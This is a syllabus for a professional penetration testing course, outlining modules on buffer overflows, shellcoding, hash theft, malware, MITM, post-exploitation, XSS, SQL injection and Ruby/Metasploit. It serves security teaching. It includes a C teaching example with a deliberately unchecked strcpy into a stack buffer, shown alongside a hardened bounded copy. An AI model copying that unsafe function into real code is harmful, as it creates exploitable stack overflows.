Syllabus: Penetration Testing Course - Professional Version 4.0

The World’s Premier Online Penetration Testing Course

Course home page: http://www.elearnsecurity.com/course/penetration_testing/

PTPv4 at a glance:

- Self-paced, online, flexible access
- 5500+ interactive slides and 14 hours of video material
- Five top level authors
- Five knowledge domains
- In depth coverage of every technique
- 27 virtual labs for Network, System and Web Application Security hands-on sessions
- Dozens of real world vulnerable networks and websites
- Reporting skills covered in depth
- Prepares for eCPPT certification
- Prepares for real world penetration testing jobs

This training course has been chosen by students in 140 countries in the world and by leading organizations such as:

System Security Section

The System Security section provides a thorough understanding of the x86 architecture and its weaknesses.

- Module 1: Architecture Fundamentals
- Module 2: Assemblers, Debuggers and Tools Arsenal
- Module 3: Buffer Overflows
- Module 4: Shellcoding
- Module 5: Cryptography and Password Cracking
- Module 6: Malware

Module 1: Architecture Fundamentals

In this module, you will learn the fundamental concepts needed to help you improve your skills in topics such as fuzzing, exploit development, buffer overflows, debugging, reverse engineering and malware analysis.

Sample source codes in C++ and Assembly language are provided in order to get the student familiar with these languages.

1. Architecture Fundamentals
1.1. Introduction
1.2. Architecture Fundamentals
1.2.1. CPU, ISA and Assembly
1.2.2. Registers
1.2.3. Process Memory
1.2.4. The Stack
1.2.4.1. PUSH Instruction
1.2.4.2. POP Instruction
1.2.4.3. Procedures and Functions
1.2.4.4. Stack Frames
1.2.4.5. Prologue
1.2.4.6. Epilogue
1.2.5. Endianness
1.2.6. NOPs
1.3. Security Implementations
1.3.1. ASLR
1.3.2. DEP
1.3.3. Stack Cookies (Canary)

Hera Labs are included in this module.


Module 2: Assemblers, Debuggers and Tools Arsenal

The previous module showed you that Assembly is a very low-level programming language consisting of mnemonics, the human-readable names for the processor's operation codes (opcodes). Although it is a low-level language, it still needs to be converted into machine code in order for the machine to execute it.

In this module you will see how this happens and what tools are required.

2. Assemblers, Debuggers and Tools Arsenal
2.1. Introduction
2.2. Assembler
  MASM
  GAS
  NASM
  FASM
2.3. Compiler
2.4. NASM
2.4.1. Installation Instructions
2.4.2. ASM Basics
2.4.3. Intel vs AT&T
2.4.4. PUSH Instruction
2.4.5. POP Instruction
2.4.6. CALL Instruction
2.5. Tools Arsenal
2.5.1. Compilers
  Microsoft Visual C/C++
  Orwell Dev-C++
  MinGW
2.5.2. Debuggers
  Immunity Debugger
  IDA
  GDB
  WinDBG
  Hopper
  OllyDBG
2.5.3. Decompiling

Module 3: Buffer Overflows

Finding and exploiting buffer overflows in real world applications is what you will learn during this incredibly hands-on module.

A hard topic is made easy through examples explained step by step, starting from the very basics of stack manipulation. Armed with assemblers, compilers and debuggers, students will learn how to hijack the execution of applications.

At the end of the module, the student is exposed to the most modern techniques used to prevent buffer overflows and the main methods to bypass them.

3. Buffer Overflows
3.1. Understanding Buffer Overflows
  Strcpy and Strncpy
  Samples and code observation
  Visual Studio
  NULL bytes
3.2. Finding Buffer Overflows
3.2.1. Finding Buffer Overflows in binary programs
3.2.2. Code Observation
3.2.3. Overflow the Buffer
3.3. Exploiting Buffer Overflows
3.3.1. Finding the right offset
  Pattern Create
  Pattern Offset
  Mona
3.3.2. Overwriting the EIP
3.4. Exploiting a Real-World Buffer Overflow
3.5. Security Implementations
3.5.1. Helpful Tools
3.5.2. Address Space Layout Randomization
3.5.2.1. Bypass Technique
3.5.2.2. Protective Measures
3.5.3. Data Execution Prevention
3.5.3.1. Bypass Technique
3.5.3.2. Protective Measures
3.5.4. Stack Canary and SafeSEH
3.5.4.1. Bypass Technique
3.5.4.2. Protective Measures
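
The Strcpy/Strncpy and NULL-byte items under 3.1 are the core of this module, so here is a short added example, written for this page and not part of the course material, that puts an unchecked strcpy into a stack buffer next to the two details students most often get wrong: strncpy does not guarantee a terminating NUL, and a correct bounded copy has to reserve a byte for it. The 16-byte buffer size and the input strings are constructed for the example.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SZ 16   /* constructed: small stack buffer for the example */

/* Vulnerable copy: strcpy stops only at the source's NUL byte, so any
 * argument of BUF_SZ or more bytes writes past buf into the saved frame
 * pointer and return address (the "Overwriting the EIP" step in 3.3.2).
 * Only ever call this with a short, trusted string. */
void copy_unchecked(const char *src)
{
    char buf[BUF_SZ];
    strcpy(buf, src);               /* no length check at all */
    printf("copied: %s\n", buf);
}

/* strncpy pitfall: it never writes more than BUF_SZ bytes, but when src
 * is BUF_SZ bytes or longer it also never writes the terminating NUL, so
 * any later string function reads past the end of buf. Returns 1 if the
 * result is terminated inside buf, 0 otherwise. */
int strncpy_is_terminated(const char *src)
{
    char buf[BUF_SZ];
    memset(buf, 'A', sizeof buf);   /* make a missing NUL observable */
    strncpy(buf, src, sizeof buf);
    return memchr(buf, '\0', sizeof buf) != NULL;
}

/* Hardened copy: bounded by the destination size and always terminated.
 * Returns the number of bytes copied, excluding the NUL. */
size_t copy_bounded(char *dst, size_t dst_sz, const char *src)
{
    size_t n;
    if (dst_sz == 0)
        return 0;
    n = strlen(src);
    if (n > dst_sz - 1)
        n = dst_sz - 1;             /* reserve one byte for the NUL */
    memcpy(dst, src, n);
    dst[n] = '\0';
    return n;
}

/* Runs copy_bounded into a BUF_SZ stack buffer. Returns the copied
 * length, or -1 if the buffer ended up unterminated. */
int copy_bounded_demo(const char *src)
{
    char buf[BUF_SZ];
    size_t n = copy_bounded(buf, sizeof buf, src);
    if (memchr(buf, '\0', sizeof buf) == NULL)
        return -1;
    return (int)n;
}

int main(void)
{
    /* constructed 20-byte input: longer than the 16-byte buffer */
    const char *longstr = "0123456789abcdefghij";

    copy_unchecked("hello");        /* safe: fits together with its NUL */
    /* copy_unchecked(longstr) would smash the stack frame: do not run it */

    printf("strncpy terminated (short input): %d\n", strncpy_is_terminated("hello"));
    printf("strncpy terminated (long input):  %d\n", strncpy_is_terminated(longstr));
    printf("bounded copy of long input: %d bytes\n", copy_bounded_demo(longstr));
    return 0;
}
```

The point to take into the labs: the overflow is not the only bug pattern to look for. A strncpy that fills the whole buffer leaves it unterminated, and the next strlen or printf walks off the end, which is the "NULL bytes" observation the module makes during code review.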

Module 4: Shellcoding

The art of shellcoding is made available to anyone through easy to understand samples and real world complex scenarios.

A small amount of theory introduces the practical examples, where you will actually create your own shellcode through the use of compilers and assemblers. Different techniques are shown in order to let you create your own shellcode.

4. Shellcoding
4.1. Execution of a Shellcode
4.2. Types of Shellcode
  Local
  Remote (Connect Back, Bind, Socket Reuse)
  Staged / Egg-hunt / Omelet
4.3. Encoding of Shellcode
4.3.1. NULL-free Encoding
4.3.2. Alphanumeric and Printable Encoding
4.4. Debugging a Shellcode
4.5. Creating our first Shellcode
4.5.1. Finding Function Addresses
4.5.2. Creating a small ASM code
4.6. A more advanced Shellcode
4.6.1. String Terminator
4.6.2. NULL-Free Shellcode
4.6.3. Manual Editing
4.6.4. Encoder tools
4.7. Shellcode and Payload Generators
4.7.1. Msfvenom

Module 5: Cryptography and Password Cracking

Almost all penetration test engagements require an understanding of cryptographic topics. This module will ensure that you are current with the most common cryptographic technologies, algorithms and tools.

You will also learn how to perform advanced password cracking using the best tools available. A thorough review of the most modern tools used to steal and crack Windows password hashes is provided.

5. Cryptography & Password Cracking
5.1. Introduction
5.2. Classification
5.3. Cryptographic Hash Function
5.4. Public Key Infrastructure
5.5. PGP
5.6. Secure Shell (SSH)
5.6.1. SSH Tunneling
5.7. Cryptographic attacks
5.8. Security pitfalls in implementing Cryptography Systems
5.9. Windows Passwords
5.9.1. LM and NT hashes
5.9.2. SAM
5.9.3. Stealing hashes – Remote
5.9.4. Stealing hashes – Local
5.9.5. Stealing hashes – Live host
5.9.6. Stealing hashes – Offline
5.9.7. Pass the hash
5.9.8. Cracking the hash

Module 6: Malware

A thorough and detailed classification of the types of malware is the introduction to a module featuring the most advanced and obscure techniques used by modern malware.

The module is enriched by three malware source codes that are dissected and explained: a keylogger, a trojan and a virus.

6. Malware
6.1. Classification
6.2. Techniques used by Malware
6.2.1. Streams
6.2.2. Hooking SSDT
6.2.3. Hooking IRP
6.2.4. Hiding a process
6.2.5. API Hooking
6.2.5.1. IAT Hooking
6.2.5.2. EAT Hooking
6.2.5.3. Inline Hooking
6.2.6. Anti-Debugging methods
6.2.7. Anti-Virtual machine methods
6.2.8. Obfuscation
6.2.9. Packers
6.2.10. Polymorphism
6.2.11. Metamorphism
6.2.11.1. Garbage Insertion
6.2.11.2. Registers Exchange
6.2.11.3. Permutation
6.3. How malware spreads
6.3.1. Null free shellcode
6.3.2. Alphanumeric shellcode
6.3.3. Percentage encoding
6.4. Real world Samples
6.4.1. Sample 1: Keylogger
6.4.2. Sample 2: Trojan
6.4.3. Sample 3: Virus

Network Security Section

The Network Security section covers the security testing methodology, techniques and tools for networked PCs and devices.

- Module 1: Information Gathering
- Module 2: Scanning
- Module 3: Enumeration
- Module 4: Sniffing and MITM attacks
- Module 5: Exploitation
- Module 6: Post-exploitation
- Module 7: Anonymity
- Module 8: Social Engineering

Module 1: Information Gathering

Information gathering is the most important phase of the overall engagement. A penetration tester will use the information collected during this phase to map the attack surface and increase the chances of breaching the organization in the same way criminals do.

eLearnSecurity proposes an extremely thorough investigation methodology that takes into account both the business and the infrastructure of the client.

Students will learn how to get access to valuable, sensitive and sometimes secret documents by means of free services, databases and specialized search engines.

Infrastructure information gathering deals with the enumeration of DNS, domains, netblocks and other web assets belonging to the organization.

1. Information Gathering
1.1. Introduction
1.2. OSINT / Search Engines
1.2.1. Organization Web Presence
1.2.2. Finding government contracts
1.2.3. Partners and third parties
1.2.4. Job postings
1.2.5. Financial information
1.2.6. Information Harvesting
1.2.6.1. theHarvester
1.2.7. Cached information
1.3. OSINT / Social Media
1.3.1. People search and investigation
1.3.2. Real world information gathering against eLSFoo
1.4. Infrastructure information gathering
1.4.1. Domains
1.4.1.1. DNS Enumeration
1.4.1.2. IPs
1.4.1.3. Bing
1.4.1.4. Netblocks & ASes
1.4.2. Netblocks
1.4.2.1. Live hosts
1.4.2.2. Further DNS
1.4.3. Maltego
1.5. Tools
1.5.1. DNSdumpster
1.5.2. DNSEnum
1.5.3. DNSMap
1.5.4. Foca & Shodan

Hera Labs are included in this module. The student is also required to conduct an investigation against a real company.

Module 2: Scanning

As one of the most important steps in the penetration test of a network, this module will first teach you the theory behind port scanning and service reconnaissance.

If you are not a network expert, the first chapters of this module will introduce you to the basics of TCP and other network protocols.

We will then show you how to use the best tools to detect live hosts, open ports and the services running on them. Through Nmap and Hping2, you will learn how to find zombie hosts and use them for idle scans, in which the target never sees a packet from the scanner's own address.

Passive and active OS fingerprinting techniques will also be covered in depth.

2. Scanning
2.1. Introduction
2.1.1. Ports, Protocols and Services
2.1.2. The Three Way Handshake
2.1.2.1. Crafting Packets
2.2. Detect Live hosts and open Ports
2.2.1. Tools
2.2.1.1. Nmap
2.2.1.1.1. SYN scan
2.2.1.1.2. Connect scan
2.2.1.1.3. UDP scan
2.2.1.1.4. Idle scan
2.2.1.1.5. NULL / FIN / Xmas
2.2.1.1.6. ACK scan
2.2.1.1.7. IP scan
2.2.1.1.8. Nmap NSE
2.2.1.2. Hping
2.2.1.3. Other Tools
2.3. Service and OS Detection
2.3.1. Banner Grabbing
2.3.2. Probing Services
2.3.3. OS Fingerprinting
2.3.3.1. Active Fingerprinting
2.4. Firewall/IDS Evasion
2.4.1. Fragmentation
2.4.2. Decoys
2.4.3. Timing
2.4.4. Source Ports

Hera Labs are included in this module.


Module 3: Enumeration

The scope of this module is to provide you with the techniques professional penetration testers employ to enumerate resources on a target.

You will be able to explore, enumerate and map the remote network and its available services through a number of different Windows and Unix tools.

NetBIOS is the subject of the first part of this module: real world examples will be explained to show the most important techniques and tools to enumerate remote Windows shares and printers. You will also learn how to test for NetBIOS null sessions, which still affect old Windows versions.

SNMP basics will be explained. The student will then be introduced to attacks against the protocol through a number of common tools.

3. Enumeration
3.1. Introduction
3.2. NetBIOS
3.2.1. What is NetBIOS
3.2.2. How NetBIOS works
3.2.3. SMB
3.2.4. NetBIOS commands and tools
3.2.4.1. Nbtstat
3.2.4.2. Nbtscan
3.2.4.3. Net command
3.2.4.4. Smbclient and mount
3.2.4.5. Null Session
3.2.4.5.1. Winfingerprint
3.2.4.5.2. Winfo
3.2.4.5.3. DumpSec
3.2.4.5.4. Enum4Linux
3.2.4.5.5. RPCClient
3.3. SNMP
3.3.1. What it is
3.3.2. How it works (Agents, MIB, OID)
3.3.3. SNMP Attacks
3.3.3.1. Enumeration
3.3.3.2. Obtaining community strings
3.3.3.3. SNMPWalk
3.3.3.4. SNMPSet
3.3.3.5. Nmap SNMP Scripts

Module 4: Sniffing & MITM

Studying ARP, how it works and how it can be manipulated to mount sophisticated attacks is made extremely easy to understand. Sniffing is a technique that you will be able to fully grasp in its most practical aspects.

We will make sure you have enough basics of network theory before we cover actual attack scenarios using the best tools available.

Man in the middle attacks are one of the most used penetration testing techniques today; you will be able to mount man in the middle attacks within local networks and over the Internet.

4. Sniffing & MITM
4.1. What sniffing means
4.1.1. Why it is possible
4.2. Sniffing in action
4.2.1. Passive Sniffing
4.2.2. Active Sniffing
4.2.2.1. MAC Flooding
4.2.2.2. ARP Poisoning
4.3. Basics of ARP
4.3.1. Gratuitous ARP
4.3.2. ARP Poisoning
4.3.2.1. Host poisoning
4.3.2.2. Gateway poisoning
4.4. Sniffing tools
4.4.1. Dsniff
4.4.2. Wireshark
4.4.3. TCPDump
4.4.4. WinDump
4.5. Man in the middle (MITM) attacks
4.5.1. What they are
4.5.2. ARP Poisoning for MITM
4.5.3. Local to Remote MITM
4.5.4. DHCP Poisoning
4.5.5. MITM in Public Key exchange
4.5.6. Attacking Tools
4.5.6.1. Ettercap
4.5.6.1.1. SSL Sniffing
4.5.6.2. Cain&Abel
4.5.6.3. Macof
4.5.6.4. Arpspoof
4.5.6.5. Bettercap
4.6. Intercepting SSL traffic
4.6.1. SSLStrip & Ettercap
4.6.2. HSTS Bypass

Module 5: Vulnerability Assessment & Exploitation

This module will teach the student how to master Nessus in order to perform thorough and targeted vulnerability scans.

Windows authentication protocols are dissected to demonstrate their weaknesses and the related attacks available in Metasploit.

The student is then immersed in the common exploitation techniques used by today's penetration testers to exploit client side and remote vulnerabilities in workstations and servers.

The module is video and lab intensive.

5. VA & Exploitation
5.1. Vulnerability Assessment
5.1.1. Vulnerability Scanners
5.1.2. Nessus
5.2. Low Hanging Fruits
5.2.1. Weak Password
5.2.1.1. Ncrack
5.2.1.2. Medusa
5.2.1.3. Patator
5.3. Exploitation
5.3.1. Metasploit intro
5.3.2. Windows Authentication Weaknesses
5.3.2.1. LM/NTLMv1
5.3.2.2. NTLMv2
5.3.2.3. SMB Relay on NTLMv1
5.3.2.4. SMB Relay on NTLMv2
5.3.3. Client-Side exploitation
5.3.4. Remote-Side Exploitation

Hera Labs are included in this module.


Module 6: Post Exploitation

eLearnSecurity's experienced instructors have come up with a proven methodology to conduct thorough exploitation of remote internal networks through advanced post exploitation techniques.

Once the student is comfortable with the most recent exploitation techniques, they will be exposed to the cyclic steps of a successful post exploitation phase.

This is the phase where criminals ensure stable, high privileged access to the remote network in order to steal and exfiltrate documents and credentials from the organization.

Penetration testers must possess the same skill-set and tools in order to test not only the perimeter security but also any kind of internal weakness that affects the organization's security.

This is a video and hands-on intensive module.

6. Post Exploitation
6.1. Introduction
6.1.1. Maintaining access and clean-up
6.1.2. Permanent edits
6.2. Privilege escalation and Maintaining access
6.2.1. Privilege escalation
6.2.1.1. Stable
6.2.1.2. Windows Privilege Escalation
6.2.1.2.1. Incognito
6.2.1.3. Linux Privilege Escalation
6.2.2. Maintaining access
6.2.2.1. Password and Hashes
6.2.2.1.1. Pass the hash
6.2.2.1.2. Cracking Hashes
6.2.2.1.3. Mimikatz
6.2.2.1.4. Windows Credentials Editor
6.2.2.2. Enable RDP Service
6.2.2.3. Backdoors
6.2.2.3.1. Persistence
6.2.2.3.2. Manual Installation
6.2.2.4. New Users
6.3. Pillaging
  Determining machine role in the remote network
  Harvesting documents
  Harvesting stored credentials
  Harvesting web browsers data
  Keylogging
  Services
6.4. Mapping the Internal Network
  ARP Scanning
  Pivoting
  Port scanning internal network
6.5. Exploitation through Pivoting

Hera Labs are included in this module.

Module 7: Anonymity

Penetration testers rarely need to cover their tracks. However, there are times when testing the efficiency of the target organization's incident response team is within the scope of a penetration tester's engagement. This module will teach techniques to perform your tests while covering your tracks.

7. Anonymity
7.1. Browsing Anonymously
7.1.1. HTTP Proxies
7.1.1.1. Anonymous proxies
7.1.1.2. Transparent proxies
7.1.2. Tor Network
7.2. Tunneling for Anonymity
7.2.1. SSH Tunneling

Module 8: Social Engineering

The Social Engineering module will guide you through the most modern social engineering attack techniques.

Real world attacks will be illustrated by exploiting the potential of social networks and people-search services such as Facebook, Spokeo or Twitter.

Almost one hour of video lessons will teach you everything you need to know to master the most important tool in the field: the Social Engineering Toolkit.

8. Social Engineering
8.1. What is Social Engineering
8.2. Types of Social Engineering
8.2.1. Pretexting
8.2.2. Phishing
8.2.3. Baiting
8.2.4. Physical
8.3. Samples of Social Engineering attacks
8.3.1. Canadian Lottery
8.3.2. FBI E-mail
8.3.3. Online Banking
8.4. Pretexting samples
8.5. Tools
8.5.1. Social Engineering Toolkit

Web Application Security Section

Today's penetration testers have to master web application attack techniques; this lab intensive section will teach the student how to conduct a thorough penetration test against web applications.

- Module 1: Introduction
- Module 2: Information Gathering
- Module 3: Cross site scripting
- Module 4: SQL Injection
- Module 5: Other Common Web Attacks

Module 1: Introduction

This module will introduce you to the web application security field and its basic terminology.

If you are new to this field, you will gather all the skills you need to move on to the more advanced modules. If you are already an advanced web application security tester, you will be introduced to the methodology and tools followed throughout the course.

1. Introduction to Web Applications
1.1. HTTP/S Protocol Basics
1.1.1. HTTP Request
1.1.2. HTTP Response
1.1.3. HTTP Header Field Definition
1.1.4. HTTPS
1.2. Encoding
1.2.1. Introduction
1.2.2. Charset
1.2.2.1. Unicode Encoding
1.2.2.2. HTML Encoding
1.2.2.3. URL Encoding
1.2.2.4. Base64
1.3. Same Origin
1.3.1. Origin Definition
1.3.2. What does SOP protect from?
1.3.3. How SOP works
1.3.3.1. Example 1
1.3.3.2. Example 2
1.3.4. Exceptions
1.3.4.1. window.location
1.3.4.1.1. Example
1.3.4.1.2. Security Issues
1.3.4.2. document.domain
1.3.4.2.1. Example
1.3.4.3. Cross Window Messaging
1.3.4.4. CORS
1.4. Cookies
1.4.1. Cookies Domain
1.4.1.1. Specified Cookie Domain
1.4.1.2. Unspecified Cookie Domain
1.4.1.3. IE Exception
1.4.2. Inspecting the Cookie Protocol
1.4.3. Cookie Installation
1.4.3.1. Correct Cookie Installation
1.4.3.2. Incorrect Cookie Installation
1.5. Sessions
1.6. Web Application Proxies
1.6.1. Burp Suite
1.6.2. OWASP ZAP

Hera Labs are included in this module.

Module 2: Information Gathering

Web application information gathering is a long and complex process. It takes insight and perseverance.

You will learn the best methodologies to collect and store information about your target web assets. This information will be used at later steps in the exploitation process.

At the end of this module, you will have so much information on your target that exploiting it will be easy and fun.

2. Information Gathering
2.1. Gathering Information On Target
2.1.1. Finding Owner, IP Addresses and Email Addresses
2.1.1.1. WHOIS tools
2.1.1.2. DNS
2.1.1.3. Nslookup and Netcraft
2.2. Infrastructure
2.2.1. Fingerprinting The Webserver
2.2.1.1. Netcat
2.2.1.2. WhatWeb
2.2.1.3. Wappalyzer
2.2.1.4. Fingerprinting Webserver Modules
2.2.2. Enumerating Subdomains
2.2.2.1. Netcraft
2.2.2.2. Google
2.2.2.3. Other tools
2.2.2.3.1. Subbrute
2.2.2.3.2. DNSrecon
2.2.2.3.3. theHarvester
2.2.2.4. Zone Transfer
2.2.3. Finding Virtual Hosts
2.3. Fingerprinting Frameworks and Applications
2.3.1. Fingerprinting Third-Party Add-Ons
2.3.2. Map
2.4. Fingerprinting Custom Applications
2.4.1. Burp Target Crawler
2.4.2. Creating Functional Graph
2.4.3. Mapping the Attack Surface
2.4.3.1. Client-Side Validation
2.4.3.2. Database Interaction
2.4.3.3. File Uploading and Downloading
2.4.3.4. User Supplied Data
2.4.3.5. Redirection
2.4.3.6. Access Controls
2.4.3.7. Error Messages
2.4.3.8. Charting
2.5. Enumerating Resources
2.5.1. Crawling The Website
2.5.2. Finding Hidden Files
2.5.2.1. Back Up and Source Code
2.5.3. Enumerating users
2.6. Relevant Information Through Misconfigurations
2.6.1. Directory Listing
2.6.2. Log and Configuration Files
2.6.3. HTTP Verbs and File Upload
2.7. Google Hacking
2.8. Shodan HQ

Hera Labs are included in this module.

Module 3: Cross Site Scripting

The most widespread web application vulnerability will be dissected and studied thoroughly.

At first, you will be provided with a theoretical explanation. This understanding will help you in the exploitation and remediation process.

Later, you will master all the techniques to find XSS vulnerabilities through black box testing and within PHP code.

Real world exploitation examples will conclude the module; you will finally steal session cookies, modify the website DOM and perform advanced phishing attacks.

This is a hands-on intensive module.

3. Cross Site Scripting
3.1. Cross site scripting
3.1.1. Basics
3.2. Anatomy of an XSS exploitation
3.3. The three types of XSS
3.3.1. Reflected XSS
3.3.2. Persistent XSS
3.3.3. DOM-based XSS
3.4. Finding XSS
3.4.1. Finding XSS
3.5. XSS Exploitation
3.5.1. XSS and Browsers
3.5.2. XSS Attacks
3.5.2.1. Cookie stealing through XSS
3.5.2.2. Defacement
3.5.2.3. XSS for Advanced phishing attacks
3.5.2.4. BeEF
3.6. Mitigations
3.6.1. Input Validation
3.6.2. Context-aware Output Encoding
3.6.3. Never trust user input

Hera Labs are included in this module.


Module 4: SQL Injection

This module contains the most advanced techniques to find and exploit SQL injections, from the explanation of the most basic SQL injection to the most advanced.

Advanced methods will be taught with real world examples, and the best tools will be demonstrated on real targets.

You will be able not only to dump remote databases but also to get root on the remote machine through advanced SQL injection techniques.

Tools will be covered in depth, and a taxonomy will help the student pick the right tool according to the environment and scenario they will face in real engagements.

This is a video and hands-on intensive module.

4. SQL Injection
4.1. Introduction to SQL Injection
4.1.1. SQL Statements
4.1.1.1. SELECT
4.1.1.2. UNION
4.1.2. SQL Queries in WebApps
4.1.3. Vulnerable Dynamic Queries
4.1.4. How Dangerous is a SQLi
4.1.5. SQLi Attack Classification
4.1.5.1. In-Band SQLi
4.1.5.2. Error-Based SQLi
4.1.5.3. Blind SQLi
4.2. Finding SQL injections
4.2.1. Simple SQL injection
4.2.2. SQL Errors in WebApps
4.2.3. Boolean Based Detection
4.3. Exploiting In-Band SQLi
4.3.1. Scenario
4.3.2. In-band attack Challenges
4.3.3. Enumerating the number of fields
4.3.3.1. Different DBMS UNION Mismatch Errors
4.3.4. Blind Enumeration
4.3.5. Identifying field types
4.3.6. Dumping database content
4.4. Exploiting Error Based SQL Injections
4.4.1. MS SQL Server Error-based exploitation
4.4.2. The CAST Technique
4.4.3. Finding the DBMS Version
4.4.4. Dumping the database
4.4.4.1. Finding the current username
4.4.4.2. Finding readable databases
4.4.4.3. Enumerating Database tables
4.4.4.4. Enumerating Columns
4.4.4.5. Dumping Data
4.4.4.6. MySQL Error-based SQLi Exploitation
4.4.4.7. PostgreSQL Error-based SQLi Exploitation
4.4.4.8. Developing Error-based SQLi Payloads
4.5. Exploiting Blind SQL Injection
4.5.1. Exploitation Scenario
4.5.2. Detecting the current user
4.5.3. Scripting blind SQLi Data Dump
4.5.4. Exploiting Blind SQLi
4.5.4.1. String extraction
4.5.5. Optimized Blind SQLi
4.5.6. Time-based Blind SQLi
4.5.7. Time Based SQL Injections
4.6. SQLMap
4.6.1. Basic Syntax
4.6.2. Extracting database banner
4.6.3. Information Gathering
4.6.4. Extracting the Database
4.6.5. Extracting the Schema
4.6.6. SQLMap Advanced Usage
4.6.6.1. Forcing the DBMS
4.6.6.2. Fine Tuning the Payloads
4.6.6.3. Aggressiveness and Load
4.7. Mitigation Strategies
4.7.1. Prepared Statements
4.7.2. Type Casting
4.7.3. Input Validation
4.8. From SQLi to Server Takeover
4.8.1. Advanced SQL Server Exploitation
4.8.1.1. Xp_cmdshell
4.8.1.2. Internal Network Host Enumeration
4.8.1.3. Port Scanning
4.8.1.4. Reading the File System
4.8.1.5. Uploading Files
4.8.1.6. Storing Command Results
4.8.2. Advanced MySQL Exploitation
4.8.2.1. Reading the File System
4.8.2.2. Uploading Files
4.8.2.3. Executing Shell Commands

Hera Labs are included in this module.

Module 5: Other Common Web Attacks

Sophisticated attacks against web applications are the subject of this module.

Session fixation and CSRF are often underestimated and overlooked vulnerabilities. They will be covered in depth.

A working exploit will be created step by step to demonstrate a CSRF vulnerability found in a famous CMS.

5. Other Common Web Attacks
5.1. Introduction
5.2. Session attacks
5.2.1. Weaknesses of the Session Identifier
5.2.2. Session Hijacking
5.2.3. Session Hijacking Attacks
5.2.3.1. Exploit Session Hijacking via XSS
5.2.3.2. Preventing Session Hijacking
5.2.3.3. Session Hijacking via Packet Sniffing
5.2.3.4. Session Hijacking via Access to the web server
5.2.4. Session Fixation Attack
5.2.4.1. Set the sessionID
5.2.4.2. Force the victim
5.2.4.3. Vulnerable Web Application
5.2.5. Preventing Session Fixation
5.3. Cross Site Request Forgery
5.3.1. Finding CSRF
5.3.2. Exploiting CSRF
5.3.3. Preventing CSRF
5.3.3.1. Why this works?
5.4. File and Resources Attacks
5.4.1. Path Traversal
5.4.1.1. Path Convention
5.4.1.2. Encoding
5.4.1.3. Best Defensive Techniques
5.4.2. File Inclusion Vulnerabilities
5.4.2.1. Local File Inclusion
5.4.2.2. Remote File Inclusion
5.4.2.3. Unrestricted File Upload

Hera Labs are included in this module.

Ruby for Pentesters and Metasploit Section

The Ruby for Pentesters and Metasploit section covers Ruby programming techniques from the very basics to advanced and penetration testing topics. Once the student masters the Ruby programming language and its features, this section covers topics such as exploiting vulnerable applications with Ruby as well as creating and editing Metasploit modules.

- Module 1: Ruby Basic: Installation and Fundamentals
- Module 2: Ruby Basic: Control structures
- Module 3: Ruby Basic: Methods, Variables and Scope
- Module 4: Ruby Advanced: Classes, Modules and Exceptions
- Module 5: Ruby Advanced: Pentester prerequisites
- Module 6: Ruby for Pentesters: Input / Output
- Module 7: Ruby for Pentesters: Network and OS interaction
- Module 8: Ruby for Pentesters: The Web
- Module 9: Ruby for Pentesters: Exploitation with Ruby
- Module 10: Ruby for Pentesters: Metasploit

Module 1: Installation and Fundamentals

In this first module of the Ruby section, the student will see how to install and configure the environment in order to work with Ruby.

Once the environment is configured, the student will learn the very basic concepts of Ruby such as running and writing scripts, using the interpreter, installing gems and much more. The student will also learn basic concepts of Ruby such as data types, variable declarations and more.

1. Installation and Fundamentals
1.1. Installation & First Look
1.1.1. Installation
1.1.1.1. Windows Installation
1.1.1.2. Other systems
1.1.1.3. Suggestions
1.1.2. Getting started
1.1.2.1. Ruby from a file
1.1.2.2. Ruby from command line
1.1.2.3. Interactive Ruby
1.1.2.4. Suggestions
1.1.3. Power of Ruby
1.1.3.1. Interactive calculator
1.1.3.2. Ruby one liners
1.1.3.3. Suggestions
1.1.4. Libraries
1.1.4.1. Ruby gems
1.2. Data Types
1.2.1. Numbers
1.2.1.1. Integer
1.2.1.2. Float
1.2.1.3. Numeric
1.2.1.4. Anticipation
1.2.1.5. Comments
1.2.2. Strings
1.2.2.1. Single or Double quotes?
1.2.2.2. Alternative Ruby Quotes
1.2.2.3. Info about strings
1.2.2.4. “Here document” notation
1.2.2.5. String arithmetic
1.2.2.6. Interpolation
1.2.2.7. Some useful methods
1.2.3. Arrays
1.2.3.1. Array creation
1.2.3.2. Accessing array elements
1.2.3.3. Multi-typed array
1.2.3.4. Multi-dimensional array
1.2.3.5. Variables and arrays
1.2.3.6. Insertions
1.2.3.7. Deletion
1.2.3.8. Operations between arrays
1.2.3.9. Stack
1.2.3.10. Some useful methods
1.2.3.11. Array and Strings
1.2.4. Ranges & Hashes
1.2.4.1. Ranges (fundamental)
1.2.4.2. Ranges (methods)
1.2.4.3. Ranges and variables
1.2.4.4. Hashes (fundamental)
1.2.4.5. Hashes (methods)

Downloadable scripts are included in this module.


Module 2: Control Structures

One of the most important program structures that a programmer has to master is the ‘flow control structure’.

In this module, the student will learn how to write and define different types of Ruby control structures. This will allow the student to create scripts and programs that are not limited to a linear sequence of statements.

2. Control Structures
2.1. Comparison operators
2.2. Conditionals
2.2.1. if
2.2.2. unless
2.2.3. case
2.2.4. Ternary operator
2.3. Loops
2.3.1. while
2.3.2. until
2.3.3. for
2.4. Iterators & Enumerators
2.4.1. Iterators
2.4.2. Enumerable objects
2.4.3. Enumerator
2.4.4. External iterators
2.4.5. Conclusion
2.5. Altering structured control flow
2.5.1. break
2.5.2. next
2.5.3. redo
2.5.4. Some considerations
2.6. BEGIN / END

Downloadable scripts are included in this module.

Module 3: Methods, Variables and Scope

Every program must be clean and have reusable structures.

In this module, the student will learn how to define and use Ruby methods, blocks, aliases and more. This is useful for creating very powerful tools and scripts.

With the introduction of methods and blocks, a very important topic needs to be covered: scope.

3. Methods, Variables and Scope
3.1. Methods
3.1.1. Simple method definitions
3.1.2. Parentheses
3.1.3. alias
3.1.4. Parameter default values
3.1.5. Variable length arguments
3.1.6. Hashes as arguments
3.1.7. Block arguments
3.1.8. Bang methods
3.1.9. Returned values
3.2. Variables & Scope
3.2.1. Variable Types
3.2.2. Local variables
3.2.3. Global variables
3.2.4. Instance & Class Variables
3.2.5. Constants
3.2.6. Some tricks

Downloadable scripts are included in this module.

Module 4: Classes, Modules and Exceptions

Ruby is an object oriented programming language. With that said, an OO program involves classes and objects.

In this module, we will start covering more advanced topics and we will see how to define and use classes, functions, modules, mixins, namespaces and much more.

Along with these topics, we will also see how to handle exceptions; exceptions are a very useful topic that needs to be mastered in order to take control of the program's behavior.

4. Classes, Modules and Exceptions
4.1. Classes principles
4.1.1. A simple class
4.1.2. Instance variables
4.1.3. Getter/Setter through Metaprogramming
4.1.4. Class Methods
4.1.5. Class Variables
4.1.6. Constants
